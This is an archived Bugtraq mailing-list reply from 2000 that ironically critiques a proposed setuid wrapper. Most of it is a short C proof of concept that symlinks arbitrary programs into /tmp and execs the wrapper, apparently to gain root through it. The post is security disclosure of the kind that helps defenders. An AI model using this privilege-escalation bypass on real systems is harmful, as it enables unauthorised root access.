Bugtraq mailing list archives
Re: Format String Attacks
From: Pavel Kankovsky <peak () ARGO TROJA MFF CUNI CZ>
Date: Wed, 13 Sep 2000 23:36:40 +0200
On Wed, 13 Sep 2000, Doug Hughes wrote:
Since I don't recall anybody else posting one, here is a simple, generic, setuid wrapper that people could use around, for instance, /usr/bin/eject or other setuid programs.
<ironic> Thank you for a nice implementation of sudo that does not bother asking for a password. Instant root for any user...very nice. But wait! It is not complete. Here is the missing piece: #include <malloc.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/param.h> #include <limits.h> int main(int argc, char **argv, char **envp) { char oldpath[MAXPATHLEN]; char newpath[sizeof("/tmp/.orig") + (CHAR_BIT*sizeof(long)/3+1)]; ++argv; srandom(getpid() + 5*time()); if (argc < 2) { fprintf(stderr, "missing argument\n"); return 1; } if (realpath(argv[0], oldpath) == NULL) { fprintf(stderr, "realpath failed\n"); return 1; } sprintf(newpath, "/tmp/%ld.orig", random()); if (symlink(oldpath, newpath) == -1) { perror("symlink"); return 1; } strrchr(newpath, '.')[0] = '\0'; argv[0] = newpath; execve("path-to-your-wrapper", argv, envp); perror("execve"); return 1; } </ironic> --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] "Resistance is futile. Open your source code and prepare for assimilation."
Current thread:
- Format String Attacks Tim Newsham (Sep 12)
- Re: Format String Attacks Iván Arce (Sep 12)
- <Possible follow-ups>
- Re: Format String Attacks Doug Hughes (Sep 13)
- Re: Format String Attacks Dan Astoorian (Sep 14)
- Re: Format String Attacks Casper Dik (Sep 15)
- Re: Format String Attacks Pavel Kankovsky (Sep 14)
- Re: Format String Attacks Dan Harkless (Sep 14)
- Re: Format String Attacks Dan Harkless (Sep 14)
- Re: Format String Attacks Dan Harkless (Sep 14)
- Re: Format String Attacks Dan Harkless (Sep 15)
- Re: Format String Attacks Dan Harkless (Sep 17)
- Re: Format String Attacks Dan Astoorian (Sep 14)
- Re: Format String Attacks Drazen Kacar (Sep 14)
- Re: Format String Attacks Dan Harkless (Sep 14)
- Re: Format String Attacks Serguei Patchkovskii (Sep 14)